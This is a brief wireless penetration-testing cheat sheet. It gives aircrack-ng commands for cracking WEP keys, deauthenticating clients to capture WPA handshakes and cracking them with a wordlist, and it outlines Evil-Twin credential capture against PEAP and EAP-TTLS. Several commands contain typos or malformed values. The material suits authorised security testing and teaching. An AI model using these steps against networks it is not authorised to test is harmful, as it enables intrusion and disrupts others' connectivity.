Wireless pentest
Open network
Usually for guest access and only for internet
The guest can access it directly or they need to authenticate through a portal
WEP
This protocol has been completely broken for many years and should not be used anymore.
We can find the key very easily
# Capture around 30 000 IV (maybe more)
airodump-ng -c 11 --bssid 60:A4:4C:20:DF:60 -w [OUTPUTFILENAME] wlan0mon
# Generate ARP traffic
aireplay-ng -3 -b 00::09:58:6F:64:1E -h 44:60:57:c8:58:A0 wlan0mon
# Monitor the number of IV with
Aircrack out.cap
# Break the key
Aircrack out.cap
WPA
2 authentication modes :
Personal = WPA PSK (Pre-Shared Key) = authentification by a secret shared with everyone (like at home)
Enterprise = WPA MGT (Management) = EAP (Extensible Authentication Protocol). It is possible to use several different EAP methods (see the official list on the IANA website) but here are the most common versions:
PEAP : historically the only protocol supported by Windows, transmits the credentials of the AD via an MSCHAPv2, thus allowing to recover a NetNTLMv2 hash through the Evil-Twin attack.
EAP-TTLS : very similar, can authenticate via login/password which can be recovered via the Evil-Twin attack if the clients do not check the certifcat of the access point.
EAP-TLS : mutual authentication by certificate.
The Hacking process
# check if the wireless card is detected
iwconfig
# shut card if necessary
ifconfig wlan0 down
# kill all interference
airmon-ng check kill
# put the card in monitor mode
iwconfig wlan0 mode monitor
# relaunch it
ifconfig wlan0 up
OR
# check if the wireless card is detected
iwconfig
# kill all interference
airmon-ng check kill
# put card in monitor mode
airmon-ng start wlan0
# check if it worked
iwconfig
# Find the ssid in our scope for the test
airodump-ng wlan0mon
# monitor our target for handshakes. For -c we need to specify the channel number found with the previous command and for the bssid option we need the mac address we also found with the previous command
airodump-ng -c <channel-number> --bbsid <MAC-ADDRESS> -w outfile
# sending deauth
airplay-ng -0 1 -a <MAC-ADDRESS> -c <MAC-ADDRESS-STATION> wlanmon0
# check our capture .ap file to crack the handshake
ls capture*
# crack the handshake with a wordlist
aircrack-ng -w wordlist -b <MAC-ADDRESS> capture-NN.cap
Tools
Equipment
The following are equipment that can be used for wifi pentest
Wireless card Alfa AWUD036NH
Alfa AWUS1900
Alfa AWUS036ACH
Alfa AWUS052NH
Alfa AWUS051NH
Alfa AWUS036NHR
TP-Link TL-WN722N
Hak5 Pineapple Nano Basic
Flipper Zero along with the wifi dev board
Resources
Last updated